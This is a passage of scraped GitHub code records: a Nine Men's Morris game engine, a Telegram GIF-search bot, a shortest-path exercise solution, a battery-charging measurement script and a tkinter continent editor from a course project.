muehl[0]==farbe and muehl[1]==0 and muehl[2]==farbe:\n wert += farbe* gewicht_offene_muehle\n if muehl[0]==0 and muehl[1]==farbe and muehl[2]==farbe:\n wert += farbe* gewicht_offene_muehle\n if self.phase==2:\n for muehl in offene_muehlen:\n if self.offene_muehle_ist_da(muehl, 1):\n wert += gewicht_offene_muehle\n if self.offene_muehle_ist_da(muehl, -1):\n wert -= gewicht_offene_muehle\n return wert\n\n\n def offene_muehle_ist_da(self, muehl, farbe):\n if self.steine[muehl[0]]==farbe and self.steine[muehl[1]]==farbe and self.steine[muehl[2]]==farbe and self.steine[muehl[3]]==0:\n return True\n else:\n return False\n\ndef ziehen(old, von, nach, nehmen, manuel = False):\n neu= muehle(list(old.steine), int(old.phase), float(old.amzug), int(old.zuege),float(old.sieger),float(old.wert))\n if old.steine[von]==old.amzug and old.steine[nach]==0 and ([min(von,nach),max(von,nach)] in connected):\n neu.steine[von]=0\n neu.steine[nach]=float(old.amzug)\n if(neu.muehlegebaut(nach, nehmen)):\n if manuel:\n print(f'{nach} ist Teil einer Mühle, {nehmen} wird entfernt')\n neu.steine[nehmen]=0\n neu.amzug=float(old.amzug*(-1))\n neu.zuege +=1\n neu.wert=float(neu.bewertung(manuel))\n neu.sieger=float(neu.weristsieger())\n return neu\n else:\n if manuel:\n print('Unzulässiger Zug!')\n if not ([min(von,nach),max(von,nach)] in connected):\n print('Felder sind nicht benachbart')\n if not old.steine[nach]==0:\n print('Zielfeld ist nicht leer')\n if not old.steine[von]==old.amzug :\n print('Du hast keinen Stein auf dem Starfeld')\n return False\n\n\n\ndef setzen(old, feld, nehmen, manuel=False):\n neu= muehle(list(old.steine), int(old.phase), float(old.amzug), int(old.zuege),float(old.sieger),float(old.wert))\n if old.steine[feld]==0:\n neu.steine[feld]=float(old.amzug)\n if(neu.muehlegebaut(feld, nehmen)):\n if manuel:\n print(f'{feld} ist Teil einer Mühle, {nehmen} wird entfernt')\n neu.steine[nehmen]=0\n neu.amzug=float(old.amzug*(-1))\n neu.zuege +=1\n neu.wert = float(neu.bewertung(manuel))\n if neu.zuege==18:\n neu.phase=2\n return neu\n else:\n if manuel:\n print('Unzulässiger Zug!')\n return False\n","repo_name":"aedolfi/muehle","sub_path":"stellung.py","file_name":"stellung.py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43735915481","text":"import asyncio\n\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram import types, Dispatcher\nfrom aiogram.utils.callback_data import CallbackData\nfrom aiogram.utils.exceptions import RetryAfter\n\nfrom create_bot import dp, bot\nfrom client.http_client import *\nfrom database import DBase\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom keyboards import inline_keyboard_lang, inline_keyboard_category\n\n\ngifs = dict()\ndbase = DBase()\nstorage = MemoryStorage()\nleng_type = \"\"\nleng_phrase = \"\"\n\ncategories_callback = CallbackData(\"CategorY__\", \"page\", \"category_name\")\n\ncategory_list = get_categories_tenor_req()\n\n\ndef get_pagination_keyboard(page: int = 0) -> InlineKeyboardMarkup:\n keyboard = InlineKeyboardMarkup(row_width=1)\n has_next_page = len(category_list) > page + 1\n\n if page != 0:\n keyboard.add(\n InlineKeyboardButton(\n text=\"👈\",\n callback_data=categories_callback.new(page=page - 1,\n category_name=f'{category_list[page - 1][\"searchterm\"]}')\n )\n )\n\n keyboard.add(\n InlineKeyboardButton(\n text=f'Показать все из \"{str.capitalize(category_list[page][\"searchterm\"])}\"',\n callback_data=f'category__{category_list[page][\"searchterm\"]}\"'\n )\n )\n\n if has_next_page:\n keyboard.add(\n InlineKeyboardButton(\n text=\"👉\",\n callback_data=categories_callback.new(page=page + 1,\n category_name=f'{category_list[page + 1][\"searchterm\"]}')\n )\n )\n\n return keyboard\n\n\n@dp.message_handler(Text(equals=\"Популярные категории\", ignore_case=True), state=None)\nasync def category_index_handler(message: types.Message):\n await bot.send_message(message.from_user.id,\n \"Показать все категории или по одной, но с превью?\",\n reply_markup=InlineKeyboardMarkup(row_width=2).row(\n InlineKeyboardButton(text=\"Все сразу\", callback_data=\"collect_cat__yes\"),\n InlineKeyboardButton(text=\"По одной\", callback_data=\"collect_cat__no\")))\n\n\n@dp.callback_query_handler(Text(startswith=\"collect_cat__\"), state=None)\nasync def show_type_category_callback_hendler(collback: types.CallbackQuery):\n callback_user_id = collback.from_user.id\n res = collback.data.split(\"__\")[1]\n if res == \"yes\":\n for teg in category_list:\n inline_keyboard_category.insert(\n InlineKeyboardButton(text=f'{teg[\"searchterm\"]}', callback_data=f'category__{teg[\"searchterm\"]}'))\n\n await bot.send_message(callback_user_id,\n 'В каждой категории по несколько вариантов популярных ��ифок. 
Нажмите на любую для просмотра.',\n reply_markup=inline_keyboard_category)\n await collback.answer()\n else:\n if res == \"no\":\n category_one = category_list[0]\n keyboard = get_pagination_keyboard() # Page: 0\n\n await bot.send_animation(\n chat_id=callback_user_id,\n animation=category_one[\"image\"],\n reply_markup=keyboard\n )\n\n\n@dp.callback_query_handler(categories_callback.filter())\nasync def paginate_category_callback_handler(query: CallbackQuery, callback_data: dict):\n page = int(callback_data.get(\"page\"))\n category_one = category_list[page]\n keyboard = get_pagination_keyboard(page=page)\n\n await bot.send_animation(\n chat_id=query.from_user.id,\n animation=category_one[\"image\"],\n reply_markup=keyboard\n )\n\n\n@dp.callback_query_handler(Text(startswith=\"category__\"), state=None)\nasync def show_list_category_colaback_hendler(collback: types.CallbackQuery):\n callback_user_id = collback.from_user.id\n res = collback.data.split(\"__\")[1]\n await collback.answer(f'Выбрана категория {res}')\n gifs_from_tenor_list = get_category_list_tenor_req(res)\n for gif in gifs_from_tenor_list:\n try:\n await bot.send_animation(callback_user_id, gif, reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n except RetryAfter as e:\n await asyncio.sleep(e.timeout)\n await collback.answer()\n\n\n\nclass FSMSearch(StatesGroup):\n subj = State()\n limit = State()\n\n\n# Машина состояний для searchAPI________________________________________________________________________________________\n# Запускаем машину состояния FSMAdmin хэндлером\n\n@dp.message_handler(Text(equals=\"Найти по слову\", ignore_case=True))\nasync def choose_lang_handler(message: types.Message):\n await message.answer(\"Выберите язык на котором будете писать запрос\", reply_markup=inline_keyboard_lang)\n\n\n@dp.callback_query_handler(Text(startswith=\"leng__\"), state=None)\nasync def colaback_hendler_lang_start_search(collback: types.CallbackQuery):\n res = collback.data.split(\"__\")[1]\n print(f'Выбран язык - {res}')\n global leng_type\n global leng_phrase\n if res == \"rus_\":\n leng_type = \"ru\"\n leng_phrase = \"русском языке\"\n print(leng_type)\n elif res == \"engl_\":\n leng_type = \"en\"\n leng_phrase = \"английском языке\"\n print(leng_type)\n await FSMSearch.subj.set()\n await collback.answer()\n await bot.send_message(collback.from_user.id, f'Напишите ключевое слово поиска на {leng_phrase}')\n\n\n# Выход из состояния\n@dp.message_handler(state=\"*\", commands='отмена')\n@dp.message_handler(Text(equals=['отмена', 'Отменить поиск'], ignore_case=True), state=\"*\")\nasync def cansel_state_search(maseege: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await maseege.reply(\"Ok, отменяем)\")\n await maseege.answer(\"Что будем искать?)\")\n\n\n# Устанавливаем машину состояния в состояние приема фото и запрашиваем у пользователя файл\n@dp.message_handler(state=FSMSearch.subj)\nasync def load_subj_sm_search(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['subj'] = message.text\n await FSMSearch.next()\n await message.answer(\"Сколько найти? Максимальное количество - 1000 gifs. 
Пишите число, это например 1, 2, 22))\")\n\n\n# Устанавливаем машину состояния в состояние приема названия и запрашиваем у пользователя текст\n@dp.message_handler(state=FSMSearch.limit)\nasync def load_limit_sm_search(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['limit'] = message.text\n await FSMSearch.next()\n await message.answer(\"Okey, я запомнил. Произвожу поиск ...\")\n async with state.proxy() as data:\n list_gifs = search_req(data[\"subj\"], data[\"limit\"], leng_type)\n for gif in list_gifs:\n await bot.send_animation(message.from_user.id, gif, reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n await message.answer(\"Сделано, жду команд!\")\n await state.finish()\n\n\n# Машина состояний для randomAPI________________________________________________________________________________________\n\n\nclass FSMRandom(StatesGroup):\n subj = State()\n\n\n@dp.message_handler(Text(equals=\"Случайная по слову\", ignore_case=True), state=None)\nasync def cm_start_random(message: types.Message):\n await FSMRandom.subj.set()\n await message.answer(\"Напишите ключевое слово для поиска на английском языке\")\n\n\n@dp.message_handler(state=\"*\", commands='отмена')\n@dp.message_handler(Text(equals=['отмена', 'Отменить поиск'], ignore_case=True), state=\"*\")\nasync def cansel_state_random(maseege: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await maseege.answer(\"Ok, отменяем)\")\n await maseege.answer(\"Что будем искать?)\")\n\n\n@dp.message_handler(state=FSMRandom.subj)\nasync def load_subj_sm_random(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['subj'] = message.text\n await FSMSearch.next()\n await message.answer(\"Okey, я запомнил. Произвожу поиск ...\")\n async with state.proxy() as data:\n await bot.send_animation(message.from_user.id, random_req(data['subj']),\n reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n await state.finish()\n await message.answer(\"Сделано, жду команд!\")\n\n\n# Машина состояний для translateAPI________________________________________________\n\nclass FSMTranslate(StatesGroup):\n phrase = State()\n\n\n@dp.message_handler(Text(equals=\"Гифка под фразу\", ignore_case=True), state=None)\nasync def cm_start_translate(message: types.Message):\n await FSMTranslate.phrase.set()\n await message.answer(\"Напишите любую фразу на английском языке\")\n\n\n@dp.message_handler(state=\"*\", commands='отмена')\n@dp.message_handler(Text(equals=['отмена', 'Отменить поиск'], ignore_case=True), state=\"*\")\nasync def cansel_state_translate(maseege: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await maseege.reply(\"Ok, отменяем)\")\n await maseege.answer(\"Что будем искать?)\")\n\n\n@dp.message_handler(state=FSMTranslate.phrase)\nasync def load_subj_sm_translate(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['phrase'] = message.text\n await FSMTranslate.next()\n await message.answer(\"Okey, я запомнил. 
Произвожу поиск ...\")\n async with state.proxy() as data:\n await bot.send_animation(message.from_user.id, translate_req(data['phrase']),\n reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n await state.finish()\n await message.answer(\"Сделано, жду команд!\")\n\n\n# trendAPI_________________________________________________________________\n\n@dp.message_handler(Text(equals=\"Популярные гифки\"))\nasync def trand_api(message: types.Message):\n await message.answer(\"Минутку, произвожу поиск...\")\n global gifs\n gifs.clear()\n gifs = trend_req()\n for item in gifs.items():\n await bot.send_animation(message.from_user.id, item[1],\n reply_markup=InlineKeyboardMarkup(row_width=1).add(\n InlineKeyboardButton(text=\"Сохранить в базу\", callback_data=\"save__\")))\n await message.answer(\"Сделано, жду команд!\")\n\n\n\n@dp.callback_query_handler(Text(startswith=\"save_\"))\nasync def colaback_hendler(collback: types.CallbackQuery):\n res = collback.data.split(\"_\")[1]\n # dbase.save_gif(gifs[res])\n # print(gifs[res])\n await collback.answer(\"В разработке...\")\n\n\ndef register_handlers_admin(dp: Dispatcher):\n dp.register_message_handler(category_index_handler, Text(equals=\"Популярные категории\", ignore_case=True),\n state=None)\n dp.register_callback_query_handler(show_type_category_callback_hendler, Text(startswith=\"collect_cat__\"),\n state=None)\n dp.register_callback_query_handler(paginate_category_callback_handler, categories_callback.filter())\n dp.register_callback_query_handler(show_list_category_colaback_hendler, Text(startswith=\"category__\"), state=None)\n\n dp.register_message_handler(choose_lang_handler, Text(equals=\"Найти по слову\", ignore_case=True))\n dp.register_callback_query_handler(colaback_hendler_lang_start_search, Text(startswith=\"leng__\"), state=None)\n dp.register_message_handler(cansel_state_search, state=\"*\", commands='отмена')\n dp.register_message_handler(load_subj_sm_search, state=FSMSearch.subj)\n dp.register_message_handler(load_limit_sm_search, state=FSMSearch.limit)\n\n dp.register_message_handler(cm_start_random, Text(equals=\"Случайная по слову\", ignore_case=True), state=None)\n dp.register_message_handler(cansel_state_random, state=\"*\", commands='отмена')\n dp.register_message_handler(load_subj_sm_random, state=FSMRandom.subj)\n\n dp.register_message_handler(cm_start_translate, Text(equals=\"Гифка под фразу\", ignore_case=True), state=None)\n dp.register_message_handler(cansel_state_translate, state=\"*\", commands='отмена')\n dp.register_message_handler(load_subj_sm_translate, state=FSMTranslate.phrase)\n\n dp.register_message_handler(trand_api, Text(equals=\"Популярные гифки\"))\n","repo_name":"vudu79/Discouts_parser_bot","sub_path":"handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":14179,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6112843870","text":"import heapq\nINF = float('inf')\n\ndef dijkstra(graph):\n costs = [INF] * len(graph)\n q = [[0, 0]]\n costs[0] = 0\n while q:\n cost, cur = heapq.heappop(q)\n for nxt in graph[cur]:\n nxt_cost = cost + 1\n\n if costs[nxt] > nxt_cost:\n costs[nxt] = nxt_cost\n heapq.heappush(q, [nxt_cost, nxt])\n \n return costs\n\ndef solution(n, edge):\n graph = [[] for _ in range(n)]\n for node1, node2 in edge:\n graph[node1-1].append(node2-1)\n graph[node2-1].append(node1-1)\n \n dist = dijkstra(graph)\n return dist.count(max(dist))","repo_name":"eello/solve-algorithm","sub_path":"programmers/LEVEL-3/가장_먼_노드_v1.py","file_name":"가장_먼_노드_v1.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72627398940","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nLaden eines Akkus mit dem M1K mit einem Sinus-modulierten Gleichstrom:\nKanal A ist im High Impedance Modus und misst die Spannung am Akku.\nKanal B ist eine Stromquelle mit sinusförmigen Stromverlauf, mit dem der Akku\nüber einen Vorwiderstand von ca. 10 Ohm aufgeladen wird.\n\nAusgegeben wird jeweils der Mittelwert und die Standardabweichung der Spannung\nvon Kanal A (Akkuspannung U_Bat) und des Stroms von Kanal B (Ladestrom I_Bat).\nBerechnet werden der Widerstand U_Bat/I_Bat sowie der differenzielle Widerstand\nWechselanteil(U_Bat)/Wechselanteil(I_Bat).\nDamit beide Widerstandswerte übereinstimmen, müsste von U_Batt noch die \nLeerlaufspannung abgezogen werden. Diese ist aber nicht bekannt.\n\n16.1.2021, S Mack\n\"\"\"\n\nimport time\nimport threading as th # damit im getrennten Thread Return-Eingabe erkannt wird\nimport numpy as np\nfrom pysmu import Session, Mode\n\n\nSAMP_RATE = 100000\nNUM_SAMPLES = 10000\nAWGB_IVAL_MIN = 100 # 140\nAWGB_IVAL_MAX = 120 # 180\nFREQ = 100\nTIME_STEP = 5 # Messzuyklus in Sekunden\nFILE_NAME = 'bat-charge.txt'\nCURR_OFFSET = 14.7 # M1K current measurement offset\n\nkeep_going = True # Flag um While-Schleife der Messung zu beenden\n\n# wird als 2. Thread ausgeführt um Return-Eingabe zu erkennen\ndef key_capture_thread(): \n global keep_going\n input()\n keep_going = False\n \nmeas_file = open(FILE_NAME,'w')\n\nmeas_file.write('Messreihe Ladevorgang Akku: AC ist Effektivwert\\n')\nmeas_file.write('Frequenz: {} Hz, Sin-Min: {} mA, Sin-Max: {} mA\\n\\n'.format(FREQ,AWGB_IVAL_MIN,AWGB_IVAL_MAX))\nmeas_file.write('t [s]; U_DC [v]; I_DC [mA]; R_DC [Ohm]; U_AC [v]; I_AC [mA]; R_Diff [Ohm]; C [mAh] \\n\\n')\n\n# 2. Thread starten\nth.Thread(target=key_capture_thread, args=(), name='key_capture_thread', daemon=True).start()\nprint('Zum Beenden Return drücken...')\nprint()\n\nsession = Session(ignore_dataflow=True, sample_rate=SAMP_RATE, queue_size=NUM_SAMPLES)\nif session.devices:\n dev = session.devices[0]\n DevID = dev.serial\n print(\"Device ID:\" + str(DevID))\n FWRev = float(dev.fwver)\n HWRev = str(dev.hwver)\n print('Firmware Revision: {}, Hardware Revision: {}'.format(FWRev, HWRev))\n print()\n if FWRev < 2.17:\n print(\"WARNING: Firmware version > 2.16 required!\")\n\n session.flush()\n CHA = dev.channels['A'] # Open CHA\n CHA.mode = Mode.HI_Z_SPLIT # Put CHA in Hi Z split mode\n CHB = dev.channels['B'] # Open CHB\n CHB.mode = Mode.HI_Z_SPLIT # Put CHB in Hi Z split mode \n dev.set_adc_mux(0) # kein ADC-Mux, d.h. 
Abtasten CA-V/I und CB-V/I\n\n CHA.mode = Mode.HI_Z\n CHB.mode = Mode.SIMV # Put CHA in SIMV mode\n periodval = SAMP_RATE/FREQ\n min_i = AWGB_IVAL_MIN/1000\n max_i = AWGB_IVAL_MAX/1000\n CHB.sine(max_i, min_i, periodval, 0) \n session.start(0)\n\n print(\"Zeit (s) DC/AC: Spannung (V) Strom (mA) Widerstand (Ohm) Ladung (mAh)\")\n print(\"---------------------------------------------------------------------\")\n start_time = time.time()\n charge_val = 0\n adc_signal = dev.read(10000, -1, True) # Dummy Auslesen, sonst fehlerhafte Werte im Array\n time.sleep(0.2)\n \n while keep_going:\n adc_signal = dev.read(NUM_SAMPLES, -1, True) # Samples aller vier Kanaele auslesen \n\n cha_u_vals = [] # Buffer loeschen\n cha_i_vals = []\n chb_u_vals = []\n chb_i_vals = []\n \n index = 0\n num_samples_real = NUM_SAMPLES\n\n if num_samples_real != len(adc_signal): # manchmal gibt ADC weniger Samples zurueck als angefordert\n num_samples_real = len(adc_signal)\n \n while index < num_samples_real:\n cha_u_vals.append(adc_signal[index][0][0])\n cha_i_vals.append(adc_signal[index][0][1])\n chb_u_vals.append(adc_signal[index][1][0])\n chb_i_vals.append(adc_signal[index][1][1])\n index = index + 1\n \n cha_u_vals = np.asarray(cha_u_vals)\n chb_i_vals = np.asarray(chb_i_vals) - CURR_OFFSET/1000 # Offset Korrektur\n \n u_ave = cha_u_vals.mean()\n i_ave = chb_i_vals.mean()\n r_ave = u_ave / i_ave\n u_std = cha_u_vals.std()\n i_std = chb_i_vals.std()\n r_std = u_std / i_std\n charge_val = charge_val + TIME_STEP * i_ave\n meas_time = int(time.time() - start_time)\n print(\"t={:4}: DC: U={:6.3f} V, I={:7.4f} mA, R={:6.3f} Ohm AC: U={:8.6f} V, I={:7.4f} mA, R={:6.4f} Ohm C={:4.1f} mAh\"\\\n .format(meas_time, u_ave, i_ave*1000, r_ave, u_std, i_std*1000, r_std, charge_val))\n meas_file.write(\"{};{:.3f};{:.4f};{:.3f};{:.6f};{:.4f};{:.4f};{:4.1f}\\n\"\\\n .format(meas_time, u_ave, i_ave*1000, r_ave,u_std, i_std*1000, r_std, charge_val))\n time.sleep(TIME_STEP)\n\n print('Programm wurde durch Return-Eingabe beendet.')\n meas_file.close()\n time.sleep(2)\n # damit M1K nach Beenden im sicheren Zustand\n CHA.mode = Mode.HI_Z_SPLIT # Put CHA in Hi Z split mode\n CHB.mode = Mode.HI_Z_SPLIT # Put CHB in Hi Z split mode\n CHA.constant(0.0)\n CHB.constant(0.0)\n if session.continuous:\n session.end()\n session.remove(dev) # damit kein Problem beim erneutem Programmstart. \nelse:\n print('no devices attached')\n","repo_name":"StefanMack/M1K","sub_path":"BattMeas/bat-charge-sine-cur.py","file_name":"bat-charge-sine-cur.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"732311251","text":"# p2app/views/continents.py\n#\n# ICS 33 Spring 2023\n# Project 2: Learning to Fly\n#\n# This is the portion of the user interface that is displayed when the\n# Edit / Continents menu item is selected.\n#\n# YOU WILL NOT NEED TO MODIFY THIS FILE AT ALL\n\nimport tkinter\nimport tkinter.messagebox\nfrom p2app.events import *\nfrom .event_handling import EventHandler\nfrom .events import *\n\n\n\nclass ContinentsView(tkinter.Frame, EventHandler):\n def __init__(self, parent):\n super().__init__(parent)\n\n search_view = _ContinentsSearchView(self)\n search_view.grid(row = 0, column = 0, sticky = tkinter.NSEW)\n\n self._edit_view = None\n\n self.rowconfigure(0, weight = 0)\n self.rowconfigure(1, weight = 1)\n self.columnconfigure(0, weight = 1)\n\n\n def on_event(self, event):\n if isinstance(event, SaveContinentFailedEvent):\n tkinter.messagebox.showerror('Save Continent Failed', event.reason())\n\n\n def on_event_post(self, event):\n if isinstance(event, DiscardContinentEvent):\n self._switch_edit_view(None)\n elif isinstance(event, NewContinentEvent):\n self._switch_edit_view(_ContinentEditorView(self, True, True, None))\n elif isinstance(event, StartEditingContinentEvent):\n self._switch_edit_view(_ContinentEditorLoadingView(self))\n elif isinstance(event, ContinentLoadedEvent):\n self._switch_edit_view(_ContinentEditorView(self, False, True, event.continent()))\n elif isinstance(event, ContinentSavedEvent):\n self._switch_edit_view(_ContinentEditorView(self, False, False, event.continent()))\n\n\n def _switch_edit_view(self, edit_view):\n if self._edit_view:\n self._edit_view.destroy()\n self._edit_view = None\n\n if edit_view:\n self._edit_view = edit_view\n self._edit_view.grid(row = 1, column = 0, padx = 5, pady = 5, sticky = tkinter.NSEW)\n\n\nclass _ContinentsSearchView(tkinter.LabelFrame, EventHandler):\n def __init__(self, parent):\n super().__init__(parent, text = 'Continent Search')\n\n code_label = tkinter.Label(self, text = 'Continent Code: ')\n code_label.grid(row = 0, column = 0, padx = 5, pady = 5, sticky = tkinter.E)\n\n self._search_code = tkinter.StringVar()\n self._search_code.trace_add('write', self._on_search_changed)\n\n code_entry = tkinter.Entry(self, textvariable = self._search_code, width = 10)\n code_entry.grid(row = 0, column = 1, sticky = tkinter.W, padx = 5, pady = 5)\n\n name_label = tkinter.Label(self, text = 'Name: ')\n name_label.grid(row = 1, column = 0, sticky = tkinter.E, padx = 5, pady = 5)\n\n self._search_name = tkinter.StringVar()\n self._search_name.trace_add('write', self._on_search_changed)\n\n name_entry = tkinter.Entry(self, textvariable = self._search_name, width = 30)\n name_entry.grid(row = 1, column = 1, sticky = tkinter.EW, padx = 5, pady = 5)\n\n self._search_button = tkinter.Button(\n self, text = 'Search', state = tkinter.DISABLED,\n command = self._on_search_button_clicked)\n\n self._search_button.grid(row = 2, column = 1, sticky = tkinter.E, padx = 5, pady = 5)\n\n empty_area = tkinter.Label(self, text = '')\n empty_area.grid(row = 3, column = 1, sticky = tkinter.NSEW, padx = 5, pady = 5)\n\n self._search_list = tkinter.Listbox(\n self, height = 4,\n activestyle = tkinter.NONE, selectmode = tkinter.SINGLE)\n\n self._search_list.bind('<>', self._on_search_selection_changed)\n self._search_list.grid(\n row = 0, column = 2, rowspan = 4, columnspan = 1, sticky = tkinter.NSEW,\n padx = 5, pady = 5)\n\n self._search_continent_ids = []\n\n button_frame = tkinter.Frame(self)\n button_frame.grid(row = 4, column 
= 2, sticky = tkinter.E, padx = 5, pady = 5)\n\n self._new_button = tkinter.Button(\n button_frame, text = 'New Continent',\n command = self._on_new_continent)\n\n self._new_button.grid(row = 0, column = 0, padx = 5, pady = 5)\n\n self._edit_button = tkinter.Button(\n button_frame, text = 'Edit Continent', state = tkinter.DISABLED,\n command = self._on_edit_continent)\n\n self._edit_button.grid(row = 0, column = 1, padx = 5, pady = 5)\n\n self.rowconfigure(0, weight = 0)\n self.rowconfigure(1, weight = 0)\n self.rowconfigure(2, weight = 0)\n self.rowconfigure(3, weight = 1)\n self.rowconfigure(4, weight = 0)\n self.columnconfigure(0, weight = 0)\n self.columnconfigure(1, weight = 1)\n self.columnconfigure(2, weight = 2)\n\n\n def _on_search_button_clicked(self):\n self.initiate_event(ClearContinentsSearchListEvent())\n self.initiate_event(StartContinentSearchEvent(self._get_search_code(), self._get_search_name()))\n\n\n def _get_search_code(self):\n code = self._search_code.get().strip()\n return code if len(code) > 0 else None\n\n\n def _get_search_name(self):\n name = self._search_name.get().strip()\n return name if len(name) > 0 else None\n\n\n def _get_selected_search_continent_id(self):\n selection, *_ = self._search_list.curselection()\n return self._search_continent_ids[selection]\n\n\n def _on_search_changed(self, *args):\n if len(self._search_code.get().strip()) > 0 or len(self._search_name.get().strip()) > 0:\n new_state = tkinter.NORMAL\n else:\n new_state = tkinter.DISABLED\n\n self._search_button['state'] = new_state\n return True\n\n\n def _on_search_selection_changed(self, event):\n if event.widget.curselection():\n new_state = tkinter.NORMAL\n else:\n new_state = tkinter.DISABLED\n\n self._edit_button['state'] = new_state\n\n\n def _on_new_continent(self):\n self.initiate_event(DiscardContinentEvent())\n self.initiate_event(NewContinentEvent())\n\n\n def _on_edit_continent(self):\n self.initiate_event(DiscardContinentEvent())\n self.initiate_event(StartEditingContinentEvent())\n self.initiate_event(LoadContinentEvent(self._get_selected_search_continent_id()))\n\n\n def on_event(self, event):\n if isinstance(event, ClearContinentsSearchListEvent):\n self._search_list.delete(0, tkinter.END)\n self._search_continent_ids = []\n self._edit_button['state'] = tkinter.DISABLED\n elif isinstance(event, ContinentSearchResultEvent):\n display_name = f'{event.continent().continent_code} - {event.continent().name}'\n self._search_list.insert(tkinter.END, display_name)\n self._search_continent_ids.append(event.continent().continent_id)\n\n\n\nclass _ContinentEditorLoadingView(tkinter.LabelFrame, EventHandler):\n def __init__(self, parent):\n super().__init__(parent)\n\n loading_label = tkinter.Label(self, text = 'Loading...')\n loading_label.grid(row = 0, column = 0, padx = 5, pady = 5, sticky = tkinter.W)\n\n\n\nclass _ContinentEditorView(tkinter.LabelFrame, EventHandler):\n def __init__(self, parent, is_new, is_editable, continent):\n if is_new:\n frame_text = 'New Continent'\n elif is_editable:\n frame_text = 'Edit Continent'\n else:\n frame_text = 'Continent Saved'\n\n super().__init__(parent, text = frame_text)\n\n self._is_new = is_new\n self._continent_id = continent.continent_id if continent else None\n code = continent.continent_code if continent and continent.continent_code else ''\n name = continent.name if continent and continent.name else ''\n\n self._continent_code = tkinter.StringVar()\n self._continent_code.set(code)\n\n self._continent_name = tkinter.StringVar()\n 
self._continent_name.set(name)\n\n continent_id_label = tkinter.Label(self, text = 'Continent ID: ')\n continent_id_label.grid(row = 0, column = 0, padx = 5, pady = 5, sticky = tkinter.E)\n\n continent_id_value_label_text = f'{self._continent_id if self._continent_id else \"(New)\"}'\n continent_id_value_label = tkinter.Label(self, text = continent_id_value_label_text)\n continent_id_value_label.grid(row = 0, column = 1, padx = 5, pady = 5, sticky = tkinter.W)\n\n code_label = tkinter.Label(self, text = 'Continent Code: ')\n code_label.grid(row = 1, column = 0, padx = 5, pady = 5, sticky = tkinter.E)\n\n if is_editable:\n code_entry = tkinter.Entry(self, textvariable = self._continent_code, width = 10)\n else:\n code_entry = tkinter.Label(self, textvariable = self._continent_code)\n\n code_entry.grid(row = 1, column = 1, padx = 5, pady = 5, sticky = tkinter.W)\n\n name_label = tkinter.Label(self, text = 'Name: ')\n name_label.grid(row = 2, column = 0, padx = 5, pady = 5, sticky = tkinter.E)\n\n if is_editable:\n name_entry = tkinter.Entry(self, textvariable = self._continent_name, width = 30)\n else:\n name_entry = tkinter.Label(self, textvariable = self._continent_name)\n\n name_entry.grid(row = 2, column = 1, padx = 5, pady = 5, sticky = tkinter.W)\n\n button_frame = tkinter.Frame(self)\n button_frame.grid(row = 4, column = 1, padx = 5, pady = 5, sticky = tkinter.SE)\n\n if is_editable:\n save_button = tkinter.Button(button_frame, text = 'Save', command = self._on_save)\n save_button.grid(row = 0, column = 0, padx = 5, pady = 5)\n\n discard_button = tkinter.Button(button_frame, text = 'Discard', command = self._on_discard)\n discard_button.grid(row = 0, column = 1, padx = 5, pady = 5)\n\n self.rowconfigure(0, weight = 0)\n self.rowconfigure(1, weight = 0)\n self.rowconfigure(2, weight = 0)\n self.rowconfigure(3, weight = 1)\n self.rowconfigure(4, weight = 0)\n self.columnconfigure(0, weight = 0)\n self.columnconfigure(1, weight = 1)\n\n\n def _on_save(self):\n if self._is_new:\n self.initiate_event(SaveNewContinentEvent(self._make_continent()))\n else:\n self.initiate_event(SaveContinentEvent(self._make_continent()))\n\n\n def _on_discard(self):\n self.initiate_event(DiscardContinentEvent())\n\n\n def _make_continent(self):\n return Continent(self._continent_id, self._continent_code.get(), self._continent_name.get())\n","repo_name":"jwmason/AirportDatabaseAccessTool","sub_path":"p2app/views/continents.py","file_name":"continents.py","file_ext":"py","file_size_in_byte":10501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
